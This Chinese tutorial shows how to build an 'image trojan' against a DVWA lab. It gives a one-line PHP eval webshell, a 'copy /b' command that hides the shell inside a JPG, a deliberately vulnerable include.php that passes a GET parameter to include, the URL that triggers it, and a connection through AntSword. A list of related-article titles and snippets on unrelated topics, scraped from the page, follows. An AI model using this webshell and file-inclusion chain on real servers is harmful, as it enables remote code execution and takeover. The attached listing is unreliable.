1. 首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。

    2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入

    3.在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg
    -b是指以二进制的方式合并复制文件,用于图像影音类文件
    -a是指以ascii方式合并复制文件,用于文本类文件
    然后发现在原来的路径中已经生成了我们想要的文件

    4.在靶机环境中上传我们的文件,上传成功会爆路径复制路径到url打开

    5.但光是上传上去仍然不够,我们还需要一个脚本来执行我们的文件。

<?phpheader("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){include $file;
}else{show_source(__file__);
}
?>

上传方式有多种,这里我就将dvwa开最低直接传上去了然后我们把爆出来的地址复制到url上最后我们利用file参数将我们之前上传的jshell.jpg文件匹配进去

http://192.168.132.188/DVWA/hackable/uploads/include.php?file=jshell.jpg

6.然后我们开蚁剑进行配置连接,将本网页的url复制进去可以进目录

简单图片木马的生成与利用相关推荐

  1. MSF(2)——各种木马的生成及简单的免杀

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 木马生成 免杀 php 免杀 Python 免杀 分析木马文件 编写免杀马 打包exe 前文链接 WAMP/DVWA/sql ...

  2. 一个简单木马分析及接管利用

    最近一段时间,感觉工作很是杂乱无章,博客也基本没时间来写,基本每月一篇,其实每写一篇也代表目前我自己的工作状态及内容.最近搞逆向这一块,找了些样本分析例子,自己也研究了一下,感觉有不少好东西,当然这些 ...

  3. 【WEB攻防】图片木马的利用

    交流Q群:876554035 一,图片木马原理 图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限. 二.工具及环境 D ...

  4. PHP 图片木马隐写方法及靶机演示

    前言 注:文章仅用于网络安全学习!!! 在上文中我们简单的讲解了一句话木马的相关的内容 上文链接:PHP 一句话木马 @eval($_POST['hack']): 语句解析及靶机演示 通常,我们还会面 ...

  5. 木马制作——图片木马制作

    木马制作--图片木马制作 一.简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中 ...

  6. 入狱小技巧之木马制作——图片木马制作

    0x01 图片木马制作 0x02 简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗 ...

  7. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  8. 用python做一个木马_Python编程简单的木马程序(转载于乌云中)

    Python编程简单的木马程序 light·2015/01/26 10:07 0x00准备好了 本文的内容仅用于研究和研究,不得用于非法目的! 这一次,我们使用Python编写了一个简单的木马,它具有 ...

  9. 朋友圈装逼高考证图片怎么在线生成制作,高考证怎么写上自己的名字?

    2019独角兽企业重金招聘Python工程师标准>>> 最近发现一个好玩的朋友圈装逼神器 - 高考准考证生成器 ####只需要输入自己的名字和学习,就可以生成自己的准考证 那么这个高 ...

  10. python数据标注工具_python实现简单图片物体标注工具

    本文实例为大家分享了python实现简单图片物体标注工具的具体代码,供大家参考,具体内容如下 # coding: utf-8 """ 物体检测标注小工具 基本思路: 对要 ...

最新文章

  1. 2016最新cocoapods版本更新,以及多个版本的问题
  2. 网络推广外包专员浅析网络推广外包优化当中的那些细枝末节!
  3. [BZOJ1222/Luogu2224][HNOI2001]产品加工
  4. JAVA--虚函数,抽象函数,抽象类,接口
  5. Spring Data Solr教程:排序
  6. Gym-100935I Farm 计算几何 圆和矩形面积交
  7. 数据库的四大特性以及事务的隔离级别
  8. (08)Verilog HDL同步复位
  9. python,web框架说明
  10. SVN下载以及中文包安装
  11. Highcharter绘制中国地图
  12. cad2012打开后闪退_windows7打不开CAD2012出现闪退的处理方法
  13. 免费苹果账号(apple id)申请ios证书p12真机调试
  14. 谁说手工测试不香了?25k不比二流的开发美滋滋
  15. 如何用待办工具组织每周的任务清单
  16. 小程序发布上线流程_小程序怎么上线?
  17. 基于OTSU最大类间方差法的ROI分割、提取图像中的形状特征--面积、周长、离心率、zernike矩
  18. c++ break语句
  19. Function简介
  20. 30个HTML+CSS前端开发案例(一)

热门文章

  1. 线性规划(LP)问题的Matlab求解
  2. 计算机图形学入门(十七)-光线追踪(蒙特卡洛积分与路径追踪)
  3. Box2D引擎实现割绳子物理部分的方法
  4. 距离度量与相似性度量
  5. 解决SQLserver 数据库恢复挂起
  6. python ttf_利用python工具生成彩色字体ttf
  7. 齐齐哈尔市全国计算机等级考试,2019年3月黑龙江省齐齐哈尔市计算机等级考试注意事项...
  8. OpenCV——图像矩
  9. (转载)学好 Python 的 11 个优秀资源
  10. SaaS和和PaaS的概念